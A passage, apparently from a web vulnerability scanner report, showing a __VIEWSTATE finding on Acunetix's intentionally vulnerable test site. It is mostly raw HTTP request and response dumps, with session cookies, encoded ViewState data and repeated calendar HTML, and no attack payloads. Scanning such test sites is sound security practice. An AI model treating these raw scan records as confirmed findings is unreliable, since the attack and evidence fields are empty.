title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8500&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAH4dWOdsIZGRkxCdm7yZ%2BkX2OqI%2FguNrhBNzupSw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLji%2F7fAwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdYbh5pGvIoSA%2F%2FbMsqJmV6LZng8A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:00 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAH4dWOdsIZGRkxCdm7yZ+kX2OqI/guNrhBNzupSw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLji/7fAwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdYbh5pGvIoSA//bMsqJmV6LZng8A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:White" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8488&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAKoroL9sIZGRkVN7n29Gtjjegh5RN%2BYI60rbvb3s%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKOivOzBQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdpaMne%2BauSh5SXSrwti00io9UWOg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:43 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAKoroL9sIZGRkVN7n29Gtjjegh5RN+YI60rbvb3s=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKOivOzBQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdpaMne+auSh5SXSrwti00io9UWOg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:White" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" 